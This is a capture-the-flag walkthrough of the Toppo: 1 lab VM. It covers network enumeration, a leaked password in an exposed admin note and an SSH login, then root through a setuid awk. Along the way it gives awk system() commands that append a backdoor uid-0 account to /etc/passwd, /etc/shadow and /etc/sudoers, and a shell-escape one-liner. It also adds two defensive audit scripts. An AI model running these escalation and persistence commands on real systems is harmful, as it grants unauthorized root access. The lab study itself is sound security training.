Amonsec


Toppo: CTF walkthrough

Information

Name: Toppo: 1

Release date: 12 Jul 2018

 

Author: Hadi Mene

Series: Toppo

Note, I used VMWare Fusion for this one.

 

Enumeration

We can find the IP address of the VM with arp-scan: the VMware vendor in the MAC column gives it away.

ronin :~# arp-scan --localnet 
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
192.168.1.33    00:0c:29:66:8e:26    VMware, Inc.
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]
[redacted]    [redacted]    [redacted]

9 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9: 256 hosts scanned in 2.409 seconds (106.27 hosts/sec). 9 responded
ronin :~# 

 

Then, we can use nmap to find open ports and identify the running services. -T5 is fine against a local lab VM, but on a real network such an aggressive timing template can drop results.

ronin :~# nmap -sV -sC -T5 192.168.1.33
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-21 11:34 EDT
Nmap scan report for ronin.home (192.168.1.33)
Host is up (0.00058s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 ec:61:97:9f:4d:cb:75:99:59:d4:c1:c4:d4:3e:d9:dc (DSA)
|   2048 89:99:c4:54:9a:18:66:f7:cd:8e:ab:b6:aa:31:2e:c6 (RSA)
|   256 60:be:dd:8f:1a:d7:a3:f3:fe:21:cc:2f:11:30:7b:0d (ECDSA)
|_  256 39:d9:79:26:60:3d:6c:a2:1e:8b:19:71:c0:e2:5e:5f (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Clean Blog - Start Bootstrap Theme
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          59576/udp  status
|   100024  1          60520/tcp  status
MAC Address: 00:0C:29:66:8E:26 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds
ronin :~# 
 

Publicly available information

According to our nmap scan, a website is running on an Apache 2.4.10 server, and the http-title is the stock "Clean Blog" Bootstrap theme. Let's look at the page content.

ronin :~# curl -X GET 'http://192.168.1.33' -s | html2text

Start_Bootstrap  Menu
     Home
     About
     Sample_Post
     Contact

** Clean Blog **
A Blog Theme by Start Bootstrap

*_Man_must_explore,_and_this_is_exploration_at_itsgreatest*
_Problems_look_mighty_small_from_150_milesup
Posted by Start_Bootstrap on September 24, 2018
===============================================================================
*_I_believe_every_human_has_a_finite_number_of_heartbeats._I_don't_intend
to_waste_any_ofmine.*
Posted by Start_Bootstrap on September 18, 2018
===============================================================================
*_Science_has_not_yet_masteredprophecy*
_We_predict_too_much_for_the_next_year_and_yet_far_too_little_for_thenext
ten.
Posted by Start_Bootstrap on August 24, 2018
===============================================================================
*_Failure_is_not_anoption*
_Many_say_exploration_is_part_of_our_destiny,_but_it’s_actually_our_duty
to_futuregenerations.
Posted by Start_Bootstrap on July 8, 2018
===============================================================================
OlderPosts→
===============================================================================

    
    
Copyright © Your Website 2018

ronin :~# 

 

So, the first thing we can do is enumerate directories and sub-directories. For that, we can use gobuster with a common web-content wordlist.

ronin :~# gobuster -u 'http://192.168.1.33/' -w /usr/share/seclists/Discovery/Web-Content/common.txt -e

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.33/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307
[+] Expanded     : true
=====================================================
http://192.168.1.33/LICENSE (Status: 200)
http://192.168.1.33/admin (Status: 301)
http://192.168.1.33/css (Status: 301)
http://192.168.1.33/img (Status: 301)
http://192.168.1.33/index.html (Status: 200)
http://192.168.1.33/js (Status: 301)
http://192.168.1.33/mail (Status: 301)
http://192.168.1.33/manual (Status: 301)
http://192.168.1.33/vendor (Status: 301)
=====================================================
ronin :~# 

 

After a few seconds, we find a really interesting directory: /admin

Directory listing is enabled there (a misconfiguration in itself), so Apache shows its contents: a text file with a note that contains a password. The username is not given, but we can guess it.

ronin :~# curl -X GET 'http://192.168.1.33/admin/' -s | html2text 
** Index of /admin **
[[ICO]]       Name             Last_modified    Size Description
===========================================================================
[[PARENTDIR]] Parent_Directory                    -
[[TXT]]       notes.txt        2018-04-15 11:16  154
===========================================================================
Apache/2.4.10 (Debian) Server at 192.168.1.33 Port 80
ronin :~# 
ronin :~# curl -X GET 'http://192.168.1.33/admin/notes.txt' -s | html2text 
Note to myself : I need to change my password :/ 12345ted123 is too outdated but the technology isn't my thing i prefer go fishing or watching soccer .
ronin :~# 

 

We can use that information to log in to the system via SSH.

Username: ted (guessed: the password 12345ted123 contains the name, and the note is written in the first person)

Password: 12345ted123

ronin :~# ssh ted@192.168.1.33
ted@192.168.1.33's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Apr 15 12:33:00 2018 from 192.168.0.29
ted@Toppo:~$ 
 

Privilege escalation

The sudo command is unavailable to us on this box, so we cannot simply run sudo -l to see what ted is allowed to do; instead we read /etc/sudoers directly. That the file is readable by ted at all is a misconfiguration: it is normally mode 0440, readable only by root.

ted@Toppo:~$ cat /etc/sudoers 
ted ALL=(ALL) NOPASSWD: /usr/bin/awk

ted@Toppo:~$ 
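Reading /etc/sudoers by eye works for a one-line file, but a real sudoers file has aliases, groups, comma-separated command lists and tags. The script below is an added example for this walkthrough, not code from the original post or from the Toppo VM: it parses sudoers-style rules and reports every user who can run a binary known to spawn a shell (awk's system(), find -exec, vim's :!, and so on). SAMPLE_SUDOERS is constructed; only the ted line is the one found on the box, the other rules are made up to exercise the parser, and the list of shell-escape binaries is an illustrative subset.

```python
"""Audit sudoers rules for commands that hand out a root shell.

Added example for this walkthrough; it is not code from the original post or
from the Toppo VM. SAMPLE_SUDOERS is constructed: the `ted` rule is the one
read from /etc/sudoers on the box, the other rules are made up to exercise the
parser. Run it on a real file with: python3 audit_sudoers.py /etc/sudoers
"""
import re
import sys

# Illustrative subset of binaries that run arbitrary commands from inside
# (awk's system(), find -exec, vim's :!, ...). Not an exhaustive list.
SHELL_ESCAPE_BINARIES = {
    "awk", "gawk", "mawk", "nawk", "find", "vim", "vi", "less", "more",
    "python", "python3", "perl", "env", "bash", "sh", "nmap", "tar", "zip",
}

SAMPLE_SUDOERS = """\
# constructed sample; only the ted line comes from the box
Defaults env_reset
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
ted ALL=(ALL) NOPASSWD: /usr/bin/awk
backup  ALL=(root) NOPASSWD: /usr/bin/rsync, /usr/bin/find
deploy  ALL=(ALL) /usr/bin/systemctl restart app
"""

# user  host = (runas) TAG: cmd, cmd
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
# Alias and Defaults lines are skipped; #include directives are treated as
# comments, so included files must be audited separately.
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")


def parse_sudoers(text):
    """Return one dict per user/group rule; comments and aliases are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
        cmds = [c.strip() for c in m.group("cmds").split(",") if c.strip()]
        rules.append({
            "user": m.group("user"),
            "runas": m.group("runas") or "root",
            "nopasswd": "NOPASSWD" in tags,
            "commands": cmds,
        })
    return rules


def find_shell_escapes(rules):
    """(user, command, note) for every rule that effectively grants a root shell."""
    findings = []
    for rule in rules:
        for cmd in rule["commands"]:
            if cmd == "ALL":
                if rule["nopasswd"]:
                    findings.append((rule["user"], cmd, "NOPASSWD"))
                continue
            binary = cmd.split()[0].rsplit("/", 1)[-1]
            if binary in SHELL_ESCAPE_BINARIES:
                note = "NOPASSWD" if rule["nopasswd"] else "password required"
                findings.append((rule["user"], cmd, note))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SUDOERS
    for user, cmd, note in find_shell_escapes(parse_sudoers(text)):
        print(f"{user} can run {cmd} as root ({note})")
```

On the sample it reports the ted/awk rule and the backup/find rule; a rule that is password-protected is still listed, since the password is the user's own and the shell escape is just as real.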

 

The file tells us that ted can run /usr/bin/awk as root without a password.

Let's try a simple command to see whether this leads to a privilege escalation.

ted@Toppo:~$ /usr/bin/awk 'BEGIN{system("id;whoami")}'
uid=1000(ted) gid=1000(ted) euid=0(root) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
root
ted@Toppo:~$
ted@Toppo:~$ id; whoami
uid=1000(ted) gid=1000(ted) groups=1000(ted),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
ted
ted@Toppo:~$ 

 

Note that we ran awk directly, without sudo, and still got euid=0: that means /usr/bin/awk is set-uid root, which is what actually gives us root here (the sudoers entry would give the same result through sudo awk if sudo were usable). With an effective uid of 0 we can write to /etc/passwd, /etc/shadow and /etc/sudoers, so we can add our own root user. The hash below is an MD5-crypt ($1$) hash of a password we chose; the sudoers line is not needed for a uid-0 account but does no harm. A quicker alternative is awk 'BEGIN{system("/bin/sh")}', which keeps euid 0 because /bin/sh is dash on Debian; bash would drop the effective uid unless started with -p.

ted@Toppo:~$ /usr/bin/awk 'BEGIN{system("echo \"offsec:x:0:0:root:/root:/bin/bash\" >> /etc/passwd; echo \"offsec:\$1\$a6a731da\$yuZSHEEzlDQxCnlAMJQ8U1:16902:0:99999:7:::\" >> /etc/shadow; echo \"offsec ALL=(ALL) ALL\" >> /etc/sudoers")}'
ted@Toppo:~$
ted@Toppo:~$ su offsec
Password: 
root@Toppo:/home/ted# tail -1 /etc/passwd
offsec:x:0:0:root:/root:/bin/bash
root@Toppo:/home/ted#
root@Toppo:/home/ted# tail -1 /etc/shadow
offsec:$1$a6a731da$yuZSHEEzlDQxCnlAMJQ8U1:16902:0:99999:7:::
root@Toppo:/home/ted#
root@Toppo:/home/ted# tail -1 /etc/sudoers 
offsec ALL=(ALL) ALL
root@Toppo:/home/ted# 
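From the defender's side, what we just did leaves obvious traces: a second uid-0 account in /etc/passwd, a weak MD5-crypt hash in /etc/shadow, and a fresh sudoers rule. The script below is an added example for this walkthrough, not code from the original post or from the Toppo VM: it audits passwd/shadow content for extra superusers, empty or weak hashes, and names that appear in one file but not the other. The file contents are constructed; only the offsec lines are the ones written to the box above, the other entries are made-up filler.

```python
"""Detect the persistence step above: a second uid-0 account appended to
/etc/passwd and /etc/shadow, protected by a weak hash.

Added example for this walkthrough; it is not code from the original post or
from the Toppo VM. The file contents are constructed: the `offsec` lines are
the ones written to the box above, the rest are made-up filler.
Run it on a live host with: sudo python3 audit_accounts.py /etc/passwd /etc/shadow
"""
import sys

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
ted:x:1000:1000:ted,,,:/home/ted:/bin/bash
guest:x:1001:1001::/home/guest:/bin/sh
offsec:x:0:0:root:/root:/bin/bash
"""

SAMPLE_SHADOW = """\
root:$6$constructedsalt$constructedhash:17636:0:99999:7:::
daemon:*:17636:0:99999:7:::
ted:$6$constructedsalt$constructedhash:17636:0:99999:7:::
guest::17636:0:99999:7:::
offsec:$1$a6a731da$yuZSHEEzlDQxCnlAMJQ8U1:16902:0:99999:7:::
"""


def parse_colon_file(text):
    """Split a passwd/shadow style file into lists of fields, skipping comments."""
    return [line.split(":") for line in text.splitlines()
            if line.strip() and not line.startswith("#")]


def find_rogue_root_accounts(passwd_text):
    """Every uid-0 entry whose name is not 'root' is an extra superuser."""
    return [f[0] for f in parse_colon_file(passwd_text)
            if f[2] == "0" and f[0] != "root"]


def find_weak_hashes(shadow_text):
    """(name, reason) for accounts whose hash is empty or uses a weak scheme."""
    weak = []
    for fields in parse_colon_file(shadow_text):
        name, h = fields[0], fields[1]
        if h.startswith(("*", "!")):
            continue                          # locked: no password login possible
        if h == "":
            weak.append((name, "empty password"))
        elif h.startswith("$1$"):
            weak.append((name, "md5crypt"))   # the scheme used for offsec above
        elif not h.startswith("$"):
            weak.append((name, "traditional DES crypt"))
    return weak


def find_unmatched_accounts(passwd_text, shadow_text):
    """Names present in one file but not the other: a sign of hand-edited files."""
    in_passwd = {f[0] for f in parse_colon_file(passwd_text)}
    in_shadow = {f[0] for f in parse_colon_file(shadow_text)}
    return sorted(in_passwd ^ in_shadow)


def audit(passwd_text, shadow_text):
    """Run all three checks and return the findings in one dict."""
    return {
        "rogue_root": find_rogue_root_accounts(passwd_text),
        "weak_hashes": find_weak_hashes(shadow_text),
        "unmatched": find_unmatched_accounts(passwd_text, shadow_text),
    }


if __name__ == "__main__":
    if len(sys.argv) == 3:
        passwd, shadow = open(sys.argv[1]).read(), open(sys.argv[2]).read()
    else:
        passwd, shadow = SAMPLE_PASSWD, SAMPLE_SHADOW
    for key, value in audit(passwd, shadow).items():
        print(f"{key}: {value}")
```

On the sample it flags offsec as a rogue uid-0 account and as an MD5-crypt user, and the made-up guest account for its empty password field. The same checks belong in a host-integrity baseline: on a sane system there is exactly one uid-0 name, and the three files are only ever changed by useradd/passwd/visudo, not by echo.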

 

Finally, we can read the flag.

root@Toppo:/home/ted# cd /root/
root@Toppo:~# cat flag.txt 
[ASCII-art banner]
Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}
root@Toppo:~# 